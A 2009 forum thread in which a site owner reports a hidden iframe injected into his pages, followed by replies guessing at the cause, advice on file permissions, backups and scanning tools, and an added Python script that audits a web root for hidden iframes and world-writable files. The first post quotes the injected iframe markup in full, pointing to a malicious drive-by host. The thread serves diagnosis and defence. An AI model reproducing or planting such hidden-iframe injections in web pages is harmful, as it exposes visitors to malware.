
Help me! Something weird is happening to my website

Discussion in 'White Hat SEO' started by thesmashge, Apr 9, 2009.

  1. thesmashge

    thesmashge Power Member

    Joined:
    Jan 14, 2009
    Messages:
    520
    Likes Received:
    519
    I have this site getting 400 visitors daily, earning me 400$ per month. It's the only source of income I have....

    Everything went alright until today...

    When visitors type my site name in the browser or go to my site through Google, the following site also gets opened:

    Code:
    hxxp://xtrarobotz.com/p1d2f3.php?id=52263&vis=1
    It's more like a blank PDF document opening than a site....

    When I check my site HTML... I find this code attached below after my code ends...

    Code:
    </body></html><iframe src="http://xtrarobotz.com/?click=5353E8" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
    I tried removing it.... But this code keeps on coming and gives problems to my site..... I am fast losing visitors.

    What is this? A virus? Somebody pls help me with this. I believe in the knowledge of BHW more than any other technical forum.... That's why I am asking for help here.... Pls reply.
     
  2. Bertik

    Bertik Newbie

    Joined:
    Apr 29, 2008
    Messages:
    30
    Likes Received:
    1
    Sounds like SQL injection. Look in the SQL for xtrarobotz and delete the entry......
     
  3. stealthisblog

    stealthisblog Regular Member

    Joined:
    May 26, 2008
    Messages:
    289
    Likes Received:
    238
    Location:
    New York City
    I'm guessing you don't know what SQL injection is. SQL injection is taking advantage of unfiltered input on the person's website to alter and retrieve database information. How can you say it's SQL injection when he didn't even post a link to his site... That's just a hidden iframe with what I believe is a PDF exploit to help whoever hacked this guy to expand his botnet.

    Someone has hacked your site and is putting that into your source. They could be doing it in so many different ways. Gimme the link to your site and I'll see if I can find how they're doing it.
     
  4. andyred

    andyred Junior Member

    Joined:
    Oct 17, 2007
    Messages:
    137
    Likes Received:
    16
    Yep... plain PHP injection in index.php
     
  5. Bertik

    Bertik Newbie

    Well, last time (like 2 years ago), my site was hacked over the SQL as far as I remember. I was looking at how they kept including the link in the code over and over and it turned out to be in one table in the SQL....
    And I remember that the link looked "exactly" the same.
    That's why I assume that his problem is like mine 2 years ago.
    Just trying to help, no hard feelings.
     
  6. thesmashge

    thesmashge Power Member

    I don't have any SQL in my site...... All I have is just a sales page..... and in another folder I have installed Drupal, which needs a MySQL DB.

    Can any of you tell me what to do to end this problem? I will be very thankful to you....
     
  7. ukescuba

    ukescuba Jr. VIP Jr. VIP Premium Member

    Joined:
    Feb 24, 2008
    Messages:
    994
    Likes Received:
    634
    Occupation:
    Mobile Marketer & QR Code Junkie
    Location:
    San Antonio, TX
    I'm not familiar with Drupal, but if it's similar to Joomla and the like, take a look at the template files that generate your page; chances are the code will be at the bottom of your template code.

    Once you have removed the offending code, check using FTP software what your chmod settings are for the folder/file. Chances are you have it set to 777; if that's the case, change it to 644.
     
    Last edited: Apr 9, 2009
  8. thesmashge

    thesmashge Power Member

    I am not on free hosting.... And I tried removing the code... but it kept coming back....

    I have overcome the problem for now, I guess..... I removed the code.... then deleted all MySQL DBs..... deleted Drupal..... deleted all subdirectories..... Since my site has just one sales page and a thank-you page, I deleted everything except them.

    When I slept and woke up, I am not getting the problem now.... Hope the nightmare is over.

    I just wonder how I would have handled this if I had a bigger site with thousands of pages of content built with hard work? And a kid injects something and all my money disappears and Google gets me banned......

    Any precautions i should follow?
     
  9. dropzone

    dropzone Registered Member

    Joined:
    Nov 3, 2008
    Messages:
    60
    Likes Received:
    44
    Google >>> Backtrack

    It's a Slax-based Linux distribution with a collection of over 300 security and forensics tools.

    You can use it to see where your holes are.
     
  10. blackhat+er

    blackhat+er Regular Member

    Joined:
    Feb 19, 2009
    Messages:
    217
    Likes Received:
    150
    Ya see, that's fine and dandy that you got rid of all of your other files, but you might not need to. If you had read what was written about changing your chmod to 644, then chances are you would be OK. The reason being that 777, I bet, is or was your current setting, and that means the file is writable by anyone, basically, which means someone can do that and much worse to you, so change it. If it continues, I would look at getting better hosting; step it up a bit and you will be more secure if you go with a good company.

    cheers
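
An added example, not part of any post in this thread: a small audit script that walks a web root and flags the two things discussed above, markup like the hidden iframe from the first post (a 1x1 or hidden iframe, or anything appended after the closing `</html>`) and files or folders left world-writable (777-style modes). The function names, the extension list and the sample page are assumptions made for illustration.

```python
import os
import re
import stat

# Hidden-iframe markers modelled on the snippet in the first post (1x1 size or hidden style).
HIDDEN_IFRAME = re.compile(
    r"<iframe\b[^>]*(?:width\s*=\s*[\"']?[01]\b|height\s*=\s*[\"']?[01]\b|"
    r"visibility\s*:\s*hidden|display\s*:\s*none)[^>]*>", re.I)
CLOSE_HTML = re.compile(r"</html\s*>", re.I)
WEB_EXTS = (".html", ".htm", ".php", ".tpl", ".inc")  # assumed set of page/template types

# Constructed sample: a page with an iframe appended after </html>, as in the first post.
SAMPLE = ('<html><body>Sales page</body></html>'
          '<iframe src="http://injected.example/" width=1 height=1 '
          'style="visibility:hidden;position:absolute"></iframe>')


def inspect_markup(text):
    """Return a list of findings for one page or template source."""
    findings = []
    if HIDDEN_IFRAME.search(text):
        findings.append("hidden-iframe")
    closes = list(CLOSE_HTML.finditer(text))
    # Anything but whitespace after the last </html> is suspicious in a static page.
    if closes and text[closes[-1].end():].strip():
        findings.append("content-after-html-close")
    return findings


def scan_webroot(root):
    """Walk root; report injected markup and world-writable files or folders."""
    report = {}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue  # symlink modes are not meaningful
            findings = []
            if st.st_mode & stat.S_IWOTH:  # the "other" write bit, set by 777/666
                findings.append("world-writable")
            if stat.S_ISREG(st.st_mode) and name.lower().endswith(WEB_EXTS):
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings += inspect_markup(fh.read())
            if findings:
                report[os.path.relpath(path, root)] = findings
    return report


if __name__ == "__main__":
    print(inspect_markup(SAMPLE))
```

When tightening permissions on what it reports, 644 fits files; directories need the execute bit to stay traversable, so 755 is the usual non-world-writable mode for them. A clean report does not show how the code got in, so the entry point (CMS, credentials, shared host) still needs to be found.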
     
  11. the_punisher

    the_punisher Power Member

    Joined:
    Feb 6, 2008
    Messages:
    506
    Likes Received:
    115
    I had that problem once. I have a huge site with around 6000 pages.

    Last year when someone clicked on my link they would get redirected to a Russian porn site. :/

    All I did was contact my host and tell them to delete this current shit and do a full backup restore from one of my weekly backups.
     
  12. blackhat+er

    blackhat+er Regular Member

    Ya, that's a quick good fix indeed, wasn't really thinking that simple :rolleyes: lol